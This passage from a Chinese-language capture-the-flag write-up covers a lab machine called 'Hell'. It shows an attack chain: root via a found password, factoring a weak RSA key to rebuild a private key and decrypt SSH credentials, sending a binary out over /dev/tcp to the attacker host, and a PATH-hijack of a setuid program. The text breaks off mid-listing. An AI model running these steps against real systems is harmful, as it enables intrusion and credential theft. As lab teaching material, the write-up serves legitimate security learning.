data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543127.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417020857162\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fe1\u606f\u641c\u96c6[5-6]<\/h3>\n<pre><code class=\"language-bash\">txhaka@53270a4eed2d:~$ cat flag.txt \n\n\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2003 \u2003\u2588\u2584\u2584\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003\u2580\u2580\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2003 \u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588\u2580\u2588\u2003\u2588 \u2580\u2588\n\nFlag 5: HELL{7H3_B00L34N_15_4150_4_VU1N}<\/code><\/pre>\n<p>\u7136\u540e\u4f7f\u7528\u4e0a\u8ff0\u7684\u5bc6\u7801\u4e2d\u7684\u4e00\u4e2a\u5bc6\u7801<code>superrootpassword<\/code>\u5373\u53ef\u767b\u5f55root\uff01<\/p>\n<pre><code class=\"language-bash\">txhaka@53270a4eed2d:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\ntxhaka@53270a4eed2d:~$ su root\nPassword: \nroot@53270a4eed2d:\/home\/txhaka# cd \/root\nroot@53270a4eed2d:~# ls -la\ntotal 40\ndrwx------ 1 root root 4096 Feb 16  2023 .\ndrwxr-xr-x 1 root root 4096 Apr 16 10:22 ..\n-rw------- 1 root root   52 Feb 16  2023 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15  2021 .bashrc\ndrwxr-xr-x 3 root root 4096 Feb 16  2023 .local\n-rw------- 1 root root 1321 Feb 16  2023 .mysql_history\n-rw-r--r-- 1 root root  161 Jul  9  2019 .profile\ndrwxr-xr-x 2 root root 4096 Feb 16  2023 creds\n-rw-r--r-- 1 root root  273 Feb 16  2023 flag.txt\n-rw-r--r-- 1 root root  132 Feb 16  2023 message.txt\nroot@53270a4eed2d:~# cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003 \u2003 \u2003 \u2003 \u2003\u2584\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2588\u2003\u2588\u2584 \u2588\n\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003\u2584\u2003\u2584\u2003\u2584\u2003 \u2003\u2588\u2580\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2003\u2588 \u2580\u2588\n\nFlag 6: HELL{7H3_5QL1_15_7H3_K3Y}\n\nroot@53270a4eed2d:~# cat message.txt\n\nFrom: pascualropi@hell.h4u\n\nHi, I have left ssh credentials in the .enc file, remember to decrypt it with your private rsa key :)\n\nroot@53270a4eed2d:~# cd creds\/\nroot@53270a4eed2d:~\/creds# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Feb 16  2023 .\ndrwx------ 1 root root 4096 Feb 16  2023 ..\n-rw-r--r-- 1 root root  129 Feb 16  2023 creds.enc\n-rw-r--r-- 1 root root  451 Feb 16  2023 public.crt\nroot@53270a4eed2d:~\/creds# cd ..\nroot@53270a4eed2d:~# cat .bash_history \nc\ncd\nls\nclear\ncat flag.txt \nls\nclear\nc d\ncd \nl\nexit\nroot@53270a4eed2d:~# cd creds\/\nroot@53270a4eed2d:~\/creds# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Feb 16  2023 .\ndrwx------ 1 root root 4096 Feb 16  2023 ..\n-rw-r--r-- 1 root root  129 Feb 16  2023 creds.enc\n-rw-r--r-- 1 root root  451 Feb 16  2023 public.crt\nroot@53270a4eed2d:~\/creds# cat creds.enc \n........(\u5947\u602a\u7684\u5b57\u7b26)\nroot@53270a4eed2d:~\/creds# cat public.crt \n-----BEGIN PUBLIC KEY-----\nMIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKBgQGN24SSfsyl\/rFafZuCr54a\nBqEpk9fJDFa78Qnk177LTPwWgJPdgY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmB\njQh7jykg7N4FUC5dkqx4gBw+dfDfytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQop\nlt34bxbXgVvJZUMfBFC6LQKBgQCkzWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl\n2M6sE8sHiedfyQ4Hvro2yfkrMObcEZHPnIba0wZ\/8+cgzNxpNmtkG\/CvNrZY81iw\n2lpm81KVmMIG0oEHy9V8RviVOGRWi2CItuiV3AUIjKXT\/TjdqXcW\/n4fJ+8YuAML\nUCV4ew==\n-----END PUBLIC KEY-----\nroot@53270a4eed2d:~\/creds# file creds.enc \ncreds.enc: data<\/code><\/pre>\n<p>\u5173\u4e8ersa\u52a0\u5bc6\u7684\u76f8\u5173\u4e8b\u9879\uff0c\u6211\u67e5\u627e\u5230\u7684\u8d44\u6599\u4e2d\u77e5\u4e4e\u4f5c\u8005<a href=\"https:\/\/www.zhihu.com\/people\/liu-jin-guang-84\">satadriver<\/a>\u7684\u56de\u7b54\u7b80\u6d01\u660e\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543128.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543128.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417022814209\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u63d0\u53d6\u4e00\u4e0bN\uff08\u4e24\u7d20\u6570\u76f8\u4e58\u5f97\u5230\u7684\u6a21\uff09\u548cE\uff08\u516c\u5f00\u6307\u6570\uff09\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/env python3\nfrom Crypto.PublicKey import RSA\n\nwith open(&quot;public.crt&quot;, &quot;r&quot;) as f:\n    key = RSA.import_key(f.read())\n    e = key.e\n    n = key.n\nprint(&quot;[+]e==&gt;{}\\n[+]n==&gt;{}&quot;.format(e,n))<\/code><\/pre>\n<blockquote>\n<p>windows\u53ef\u80fd\u4f1a\u51fa\u73b0\u62a5\u9519\uff0c\u53ef\u4ee5\u5c1d\u8bd5https:\/\/blog.csdn.net\/u011027547\/article\/details\/123581758<\/p>\n<\/blockquote>\n<p>\u63d0\u53d6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-text\">[+]e==&gt;115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139\n[+]n==&gt;279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517<\/code><\/pre>\n<p>\u4f7f\u7528<a href=\"http:\/\/factordb.com\/\">\u8fd9\u4e2a\u7f51\u7ad9<\/a>\u5bf9n\u8fdb\u884c\u5206\u89e3\u56e0\u5f0f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543129.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543129.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417025452224\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230\u4e24\u4e2a\u56e0\u5f0f\uff1a<\/p>\n<pre><code>p=138332730979330219856304683346871871770016076664792385217756486565264414883613702355484155067169073708131875489151186473\n19766004327241150104265530014047083\nq=201965962654304519806134133066947216662284527878164688789843567876520994722309341291582467112996951355410672076462819016\n20878148034692171475252446937792199\nm=n-(p+q-1)<\/code><\/pre>\n<p>\u7136\u540e\u53c2\u8003\u76f8\u5173\u7684\u811a\u672c\u8fdb\u884c\u7f16\u5199\uff1a<a href=\"https:\/\/stackoverflow.com\/questions\/4798654\/modular-multiplicative-inverse-function-in-python\">https:\/\/stackoverflow.com\/questions\/4798654\/modular-multiplicative-inverse-function-in-python<\/a><\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nfrom Crypto.PublicKey import RSA\n\nn=279385031788393610858518717453056412444145495766410875686980235557742299199283546857513839333930590575663488845198789276666170586375899922998595095471683002939080133549133889553219070283957020528434872654142950289279547457733798902426768025806617712953244255251183937835355856887579737717734226688732856105517\ne=115728201506489397643589591830500007746878464402967704982363700915688393155096410811047118175765086121588434953079310523301854568599734584654768149408899986656923460781694820228958486051062289463159083249451765181542090541790670495984616833698973258382485825161532243684668955906382399758900023843171772758139\np=13833273097933021985630468334687187177001607666479238521775648656526441488361370235548415506716907370813187548915118647319766004327241150104265530014047083\nq=20196596265430451980613413306694721666228452787816468878984356787652099472230934129158246711299695135541067207646281901620878148034692171475252446937792199\n\nm=n-(p+q-1)\n\ndef egcd(a, b):\n    if a == 0:\n        return (b, 0, 1)\n    else:\n        g, y, x = egcd(b % a, a)\n        return (g, x - (b \/\/ a) * y, y)\n\ndef modinv(a, m):\n    g, x, y = egcd(a, m)\n    if g != 1:\n        raise\n    else:\n        return x % m\n\nd = modinv(e, m)\n\nkey = RSA.construct((n, e, d, p, q))\nprint(key.exportKey().decode())<\/code><\/pre>\n<p>\u7136\u540e\u5c31\u6784\u5efa\u51fa\u79c1\u94a5\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">-----BEGIN RSA PRIVATE KEY-----\nMIICOQIBAAKBgQGN24SSfsyl\/rFafZuCr54aBqEpk9fJDFa78Qnk177LTPwWgJPd\ngY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmBjQh7jykg7N4FUC5dkqx4gBw+dfDf\nytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQoplt34bxbXgVvJZUMfBFC6LQKBgQCk\nzWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl2M6sE8sHiedfyQ4Hvro2yfkrMObc\nEZHPnIba0wZ\/8+cgzNxpNmtkG\/CvNrZY81iw2lpm81KVmMIG0oEHy9V8RviVOGRW\ni2CItuiV3AUIjKXT\/TjdqXcW\/n4fJ+8YuAMLUCV4ewIgSJiewFB8qwlK2nqa7taz\nd6DQtCKbEwXMl4BUeiJVRkcCQQEIH6FjRIVKckAWdknyGOzk3uO0fTEH9+097y0B\nA5OBHosBfo0agYxd5M06M4sNzodxqnRtfgd7R8C0dsrnBhtrAkEBgZ7n+h78BMxC\nh6yTdJ5rMTFv3a7\/hGGcpCucYiadTIxfIR0R1ey8\/Oqe4HgwWz9YKZ1re02bL9fn\ncIKouKi+xwIgSJiewFB8qwlK2nqa7tazd6DQtCKbEwXMl4BUeiJVRkcCIEiYnsBQ\nfKsJStp6mu7Ws3eg0LQimxMFzJeAVHoiVUZHAkA3pS0IKm+cCT6r0fObMnPKoxur\nbzwDyPPczkvzOAyTGsGUfeHhseLHZKVAvqzLbrEdTFo906cZWpLJAIEt8SD9\n-----END RSA PRIVATE KEY-----<\/code><\/pre>\n<p>\u53d1\u9001\u8fc7\u53bb\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ vim rsa           \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ head rsa           \n-----BEGIN RSA PRIVATE KEY-----\nMIICOQIBAAKBgQGN24SSfsyl\/rFafZuCr54aBqEpk9fJDFa78Qnk177LTPwWgJPd\ngY6ZZC9w7LWuy9+fSFfDnF4PI3DRPDpvvqmBjQh7jykg7N4FUC5dkqx4gBw+dfDf\nytHR1LeesYfJI6KF7s0FQhYOioCVyYGmNQoplt34bxbXgVvJZUMfBFC6LQKBgQCk\nzWwClLUdx08Ezef0+356nNLVml7eZvTJkKjl2M6sE8sHiedfyQ4Hvro2yfkrMObc\nEZHPnIba0wZ\/8+cgzNxpNmtkG\/CvNrZY81iw2lpm81KVmMIG0oEHy9V8RviVOGRW\ni2CItuiV3AUIjKXT\/TjdqXcW\/n4fJ+8YuAMLUCV4ewIgSJiewFB8qwlK2nqa7taz\nd6DQtCKbEwXMl4BUeiJVRkcCQQEIH6FjRIVKckAWdknyGOzk3uO0fTEH9+097y0B\nA5OBHosBfo0agYxd5M06M4sNzodxqnRtfgd7R8C0dsrnBhtrAkEBgZ7n+h78BMxC\nh6yTdJ5rMTFv3a7\/hGGcpCucYiadTIxfIR0R1ey8\/Oqe4HgwWz9YKZ1re02bL9fn\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ python3 -m http.server 8899\nServing HTTP on 0.0.0.0 port 8899 (http:\/\/0.0.0.0:8899\/) ...\n172.20.10.3 - - [16\/Apr\/2024 15:11:11] &quot;GET \/rsa HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\">root@53270a4eed2d:~\/creds# wget http:\/\/172.20.10.8:8899\/rsa\n--2024-04-16 13:11:12--  http:\/\/172.20.10.8:8899\/rsa\nConnecting to 172.20.10.8:8899... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 838 [application\/octet-stream]\nSaving to: \u2018rsa\u2019\n\nrsa                                   100%[=========================================================================&gt;]     838  --.-KB\/s    in 0s      \n\n2024-04-16 13:11:12 (149 MB\/s) - \u2018rsa\u2019 saved [838\/838]\nroot@53270a4eed2d:~\/creds# openssl pkeyutl -decrypt -inkey rsa -in creds.enc\n\nCredentials for ssh in hell:\n\nUsername: pascual\nPassword: vulnwhatsapp123!<\/code><\/pre>\n<p>\u62ff\u5230\u8d26\u53f7\u5bc6\u7801\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-apl\">pascual\nvulnwhatsapp123!<\/code><\/pre>\n<p>\u7136\u540e\u4ecekali\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543130.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543130.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417031703746\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fde\u4e0a\u53bb\u4e86\uff01\uff01\uff01<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6[7]<\/h3>\n<pre><code class=\"language-bash\">pascual@hell:~$ whoami;id\npascual\nuid=1004(pascual) gid=1004(pascual) groups=1004(pascual)\npascual@hell:~$ ls -la\ntotal 40\ndrwxr-x--- 5 pascual pascual 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root    root    4096 Feb 16  2023 ..\n-rw------- 1 pascual pascual  295 Feb 16  2023 .bash_history\n-rw-r--r-- 1 pascual pascual  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 pascual pascual 3771 Jan  6  2022 .bashrc\ndrwx------ 2 pascual pascual 4096 Feb 16  2023 .cache\ndrwxrwxr-x 3 pascual pascual 4096 Feb 16  2023 .local\n-rw-r--r-- 1 pascual pascual  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 pascual pascual 4096 Feb 16  2023 .ssh\n-r-------- 1 pascual pascual  275 Feb 16  2023 flag.txt\npascual@hell:~$ cat flag.txt \n\n\u2588\u2580\u2588\u2003\u2584\u2580\u2588\u2003\u2588\u2580\u2003\u2588\u2580\u2580\u2003\u2588 \u2588\u2003\u2584\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2588\u2003\u2588\n\u2588\u2580\u2580\u2003\u2588\u2580\u2588\u2003\u2584\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2580\u2003\u2588\n\nFlag 7: HELL{R54C7F7001_OR_M4NU41?}\n\npascual@hell:~$ sudo -l\n[sudo] password for pascual: \nSorry, user pascual may not run sudo on hell.\npascual@hell:~$ cd ..\npascual@hell:\/home$ ls -la\ntotal 28\ndrwxr-xr-x  7 root    root    4096 Feb 16  2023 .\ndrwxr-xr-x 19 root    root    4096 Feb 16  2023 ..\ndrwxr-x---  6 eddie   eddie   4096 Feb 16  2023 eddie\ndrwxr-x---  6 gato    gato    4096 Feb 16  2023 gato\ndrwxr-x---  5 ghost   ghost   4096 Feb 16  2023 ghost\ndrwxr-x---  5 pascual pascual 4096 Feb 16  2023 pascual\ndrwxr-x---  3 run     run     4096 Feb 16  2023 run\npascual@hell:\/home$ cd eddie\/\n-bash: cd: eddie\/: Permission denied\npascual@hell:\/home$ cd gato\/\n-bash: cd: gato\/: Permission denied\npascual@hell:\/home$ cd ghost\/\n-bash: cd: ghost\/: Permission denied\npascual@hell:\/home$ mail\n-bash: mail: command not found\npascual@hell:\/home$ cd \/var\/www\npascual@hell:\/var\/www$ ls -la\ntotal 20\ndrwxr-xr-x  4 root root    4096 Feb 16  2023 .\ndrwxr-xr-x 14 root root    4096 Feb 15  2023 ..\n-rw-r--r--  1 root root    3771 Feb 16  2023 .bashrc\ndr-xr-xr-x  2 run  ftpuser 4096 Feb 16  2023 ftp\ndrwxr-xr-x  2 root root    4096 Feb 15  2023 html\npascual@hell:\/var\/www$ cd ..\npascual@hell:\/var$ ls -la\ntotal 56\ndrwxr-xr-x 14 root root  4096 Feb 15  2023 .\ndrwxr-xr-x 19 root root  4096 Feb 16  2023 ..\ndrwxr-xr-x  2 root root  4096 Apr 16 15:49 backups\ndrwxr-xr-x 12 root root  4096 Feb 15  2023 cache\ndrwxrwxrwt  2 root root  4096 Feb 15  2023 crash\ndrwxr-xr-x 34 root root  4096 Feb 16  2023 lib\ndrwxrwsr-x  2 root staff 4096 Apr 18  2022 local\nlrwxrwxrwx  1 root root     9 Aug  9  2022 lock -&gt; \/run\/lock\ndrwxr-xr-x 10 root root  4096 Apr 17  2024 log\ndrwxrwsr-x  2 root mail  4096 Feb 16  2023 mail\ndrwxr-xr-x  2 root root  4096 Aug  9  2022 opt\nlrwxrwxrwx  1 root root     4 Aug  9  2022 run -&gt; \/run\ndrwxr-xr-x  2 root root  4096 Aug  8  2022 snap\ndrwxr-xr-x  3 root root  4096 Feb 16  2023 spool\ndrwxrwxrwt  5 root root  4096 Apr 16 19:09 tmp\ndrwxr-xr-x  4 root root  4096 Feb 16  2023 www\npascual@hell:\/var$ mail\n-bash: mail: command not found\npascual@hell:\/var$ cd mail\npascual@hell:\/var\/mail$ ls -la\ntotal 16\ndrwxrwsr-x  2 root    mail    4096 Feb 16  2023 .\ndrwxr-xr-x 14 root    root    4096 Feb 15  2023 ..\n-r--------  1 eddie   eddie    142 Feb 15  2023 eddie\n-r--------  1 pascual pascual  166 Feb 16  2023 pascual\npascual@hell:\/var\/mail$ cat eddie\ncat: eddie: Permission denied\npascual@hell:\/var\/mail$ cat pascual \n\nFrom: eddiedota@hell.h4u\n\nI have created a reports binary in \/opt\/reports\/reports with which you can read the reports by passing an identifier as an argument to it<\/code><\/pre>\n<h3>\u5206\u6790\u7a0b\u5e8f<\/h3>\n<pre><code class=\"language-bash\">pascual@hell:\/var\/mail$ file \/opt\/reports\/reports\n\/opt\/reports\/reports: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=d1b6c948d168422ee65e2906cac08a2217ff8f11, for GNU\/Linux 3.2.0, not stripped\npascual@hell:\/opt\/reports$ ls -l reports \n-rwsr-xr-x 1 eddie eddie 16208 Feb 16  2023 reports<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">pascual@hell:\/var\/mail$ \/opt\/reports\/reports\n[-] Usage: \/opt\/reports\/reports &lt;id for report&gt;\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 1\nVulnerability: A Local File Inclusion has been detected in one of our web servers.\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 2\nVulnerability: SQL Injection has been detected in one of our servers.\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 3\nAttention: Please fix this as soon as possible.\n\npascual@hell:\/var\/mail$ \/opt\/reports\/reports 4\ncat: \/home\/eddie\/report\/4: No such file or directory<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f20\u5230\u672c\u5730\u9006\u5411\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ file report                     \nreport: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=d1b6c948d168422ee65e2906cac08a2217ff8f11, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ checksec --file=report \nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nFull RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   42 Symbols        No    0               2               report<\/code><\/pre>\n<p>ida64\u6253\u5f00\u770b\u4e00\u4e0b\u4e3b\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  const char *v4; \/\/ rsi\n  const char *v5; \/\/ rdi\n  int result; \/\/ eax\n  unsigned __int64 v7; \/\/ rdx\n  unsigned __int64 v8; \/\/ rt1\n  const char **v9; \/\/ [rsp-A8h] [rbp-A8h]\n  int i; \/\/ [rsp-94h] [rbp-94h]\n  const char *v11; \/\/ [rsp-90h] [rbp-90h]\n  __int64 v12; \/\/ [rsp-88h] [rbp-88h]\n  unsigned __int64 v13; \/\/ [rsp-20h] [rbp-20h]\n  __int64 v14; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v14 = v3;\n  v9 = argv;\n  v13 = __readfsqword(0x28u);\n  if ( argc &gt; 1 )\n  {\n    sub_1100(1002LL, 1002LL, envp);\n    v11 = argv[1];\n    for ( i = 0; i &lt; (unsigned __int64)sub_10C0(v11); ++i )\n    {\n      if ( (unsigned int)(v11[i] - 48) &gt; 9 )\n      {\n        v4 = v11;\n        v5 = &quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] The input must be an identifier digit\\n\\n&quot;;\n        sub_10F0(&quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] The input must be an identifier digit\\n\\n&quot;, v11);\n        result = 1;\n        goto LABEL_9;\n      }\n    }\n    sub_10B0(10LL);\n    v4 = &quot;cat \/home\/eddie\/report\/%s&quot;;\n    sub_1110(&amp;v12, &quot;cat \/home\/eddie\/report\/%s&quot;, v11);\n    sub_10E0(&amp;v12);\n    v5 = byte_9 + 1;\n    sub_10B0(10LL);\n    result = 0;\n  }\n  else\n  {\n    v4 = *argv;\n    v5 = &quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] Usage: %s &lt;id for report&gt;\\n\\n&quot;;\n    result = sub_10F0(&quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] Usage: %s &lt;id for report&gt;\\n\\n&quot;, *v9);\n  }\nLABEL_9:\n  v8 = __readfsqword(0x28u);\n  v7 = v13 - v8;\n  if ( v13 != v8 )\n    result = sub_10D0(v5, v4, v7);\n  return result;\n}<\/code><\/pre>\n<h3>\u52ab\u6301\u73af\u5883\u53d8\u91cf<\/h3>\n<p>\u5f88\u660e\u663e\u53d1\u73b0\uff0c\u5b83\u4f7f\u7528\u7684\u662f\u76f8\u5bf9\u8def\u5f84\u800c\u975e\u7edd\u5bf9\u8def\u5f84\uff0c\u5c1d\u8bd5\u52ab\u6301\u73af\u5883\u53d8\u91cf\u8fdb\u884c\u6267\u884c\u6211\u4eec\u60f3\u8981\u7684\u51fd\u6570\uff01<\/p>\n<pre><code class=\"language-bash\">pascual@hell:\/opt\/reports$ cat reports &gt; \/dev\/tcp\/172.20.10.8:8888\n-bash: \/dev\/tcp\/172.20.10.8:8888: No such file or directory\npascual@hell:\/opt\/reports$ cat reports &gt; \/dev\/tcp\/172.20.10.8\/8888\npascual@hell:\/opt\/reports$ cd \/tmp\npascual@hell:\/tmp$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\npascual@hell:\/tmp$ echo &quot;\/bin\/bash&quot; &gt; cat\npascual@hell:\/tmp$ head cat\n\/bin\/bash\npascual@hell:\/tmp$ PATH=$PWD:$PATH\npascual@hell:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\npascual@hell:\/tmp$ chmod +x cat\npascual@hell:\/tmp$ \/opt\/reports\/reports 1\n\neddie@hell:\/tmp$ whoami;id\neddie\nuid=1002(eddie) gid=1004(pascual) groups=1004(pascual)<\/code><\/pre>\n<p>\u6211\u4eec\u62ff\u4e0b\u4e86<code>eddie<\/code>\u7528\u6237\u3002<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">eddie@hell:\/home\/eddie$ ls -la\nctotal 40\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root  root  4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root  root     9 Feb 16  2023 .bash_history -&gt; \/dev\/nulld\n-rw-r--r-- 1 eddie eddie  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 eddie eddie 3771 Jan  6  2022 .bashrc\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .cache\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 .local\n-rw-r--r-- 1 eddie eddie  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 .ssh\n-r-------- 1 eddie eddie  238 